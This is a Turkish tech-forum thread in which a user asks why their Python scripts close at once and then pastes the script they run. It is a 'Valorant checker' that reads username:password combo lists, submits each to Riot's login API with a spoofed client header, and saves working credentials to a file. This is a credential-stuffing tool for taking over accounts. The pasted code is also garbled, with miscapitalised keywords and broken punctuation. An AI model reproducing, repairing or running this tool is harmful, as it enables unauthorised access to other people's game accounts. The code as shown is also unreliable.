Python Dosyaları kapanıyor

Oldus

Hectopat
Katılım
2 Eylül 2022
Mesajlar
464
Çözümler
2
Daha fazla  
Cinsiyet
Erkek
Python'un hem yeni hem de eski sürümlerini denedim ama açtığım Python dosyaları açtım hızda kapanıyor. Add Python diyorum olmuyor neden olabilir? Zaten yüklerken 2 seçenek var tek tek denedim. En sonunda 2 tiki seçtim yine aynı.
 
Kapanan dosyanın kodlarını buraya ekler misin?

Yasak mı değil mi bilmiyorum ama checker kullanıyorum.

Kapanan dosyanın kodlarını buraya ekler misin?

Kendi bilgisayarım'da kapanıyor ama sanal Bilgisayar'da kapanmıyor.

Kodlar.

From colorama import fore, init, style.
İmport requests, typing, SSL, ctypes, OS.

"""
Thıs ıs a Free versıon of the Valorant checker.

Paıd versıon can ınclude features lıke:
Skin checker.
Rank checker.
Level checker.
Email Access checker.
Region checker.
Skins checker.
Much more. Join Discord for more info.

"""
Class ssladapter(requests. Adapters. Httpadapter):
Def init_poolmanager(self, *a: Typing. Any, **k: Typing. Any) -> none:
C = SSL. Create_default_context(SSL. Purpose. Server_auth)
C. Set_ciphers(":".join(["ECDHE-ECDSA-AES128-GCM-SHA256", "ECDHE-ECDSA-CHACHA20-POLY1305", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-CHACHA20-POLY1305", "ECDHE+AES128", "RSA+AES128", "ECDHE+AES256", "RSA+AES256", "ECDHE+3DES", "RSA+3DES"]))
K["ssl_context"] = C
Return super(ssladapter, self).init_poolmanager(*a, **k)

Class Valorant:

Def init(self):

Self. Ranks = {
"Unranked": 0,
"İron": 0,
"Bronze": 0,
"Silver": 0,
"Gold": 0,
"Platinum": 0,
"Diamond": 0,
"Ascendant": 0,
"İmmortal": 0,
"Radiant": 0,
"Unknown": 0
}

Self. Skins = {
"1-9": 0,
"10-19": 0,
"20-29": 0,
"30-39": 0,
"40-49": 0,
"50-59": 0,
"60-69": 0,
"70-79": 0,
"80-89": 0,
"90-99": 0,
"100-109": 0,
"110-119": 0,
"120-129": 0,
"130-139": 0,
"140-149": 0,
"150+": 0
}

Self. Regions = {
"EU": 0,
"Na": 0,
"AP": 0,
"Br": 0,
"Kr": 0,
"Latam": 0,
"Unknown": 0,
}

Self.combos = []

Def session(self, login = false):
Session = requests.Session()
Session. Trust_env = false.
İf login:
Session. Headers = {
"User-agent": "RiotClient/58.0.0.4640299.4552318 %s (Windows; 10; Professional, X64)",
"Accept-language": "en-us, en; Q=0.9",
"Accept": "application/json, text/plain, /"
}
Session. Mount("https://", SSLAdapter())
Return session.

Def load_combos(self):
İf os.path.exists("combo.txt"):
With open("combo.txt", "r", encoding = "utf-8") as F:
For line in f.readlines():
Line = line. Replace("\n", "")
Self.combos. Append(line)

Else:
open("combo.txt", "a").close()

Def login(self, combo):
Username = combo. Split(":")[0]
Password = combo. Split(F"{username}:")[1]
Session = self. Session(true)
R = session.post("https://auth.riotgames.com/api/v1/authorization", JSON = {"acr_values": "urn:riot:Bronze", "claims": "", "client_id": "Riot-Client", "nonce": "oynvwcsrls5ıhkh7iı16oq", "redirect_uri": "http://localhost/redirect", "response_type": "token id_token", "scope": "openid link ban lol_region"})
İf r.json().get("type") == "auth":
İf r.json().get("error") == None:
Login = session.put("https://auth.riotgames.com/api/v1/authorization", JSON = {"type": "auth", "username": Username, "password": Password})
İf "auth_failure" in login. Text:
Print(F"{fore. Red}[Invalid] {fore. Whıte}{combo}")
Elif "uri" in login. Text:
Print(F"{fore. Green}[Valid] {fore. Whıte}{combo}")
With open("Valid.txt", "a") as F:
F. Write(combo + "\n")
Else:
Print(F"{fore. Lıghtyellow_ex}[Error] {fore. Whıte}{login. Text} {combo}")

Def main(self):
self.load_combos()
OS. System("cls")
Print("this is a Free version. It does not include things like:\nproxy support\nSkin checking\nEmail Access checking\nRank checking\nEtc.")
Print("{} combos loaded".format(len(self.combos)))
For combo in self.combos:
Self. Login(combo)
Print("\nfinished checking.")

Def get_vp_points(self):
"""
Removed from Free version.
"""

Def get_rp_points(self):
"""
Removed from Free version.
"""

Def proxy_support(self):
"""
Removed from Free version.
"""

Def check_ranks(self):
"""
Removed from Free version.
"""

Def sort_accounts(self):
"""
Removed from Free version.
"""

Def email_access_fa_checker(self):
"""
Removed from Free version.
"""

Obj = valorant()
obj.main()
input()
 

Technopat Haberler

Geri
Yukarı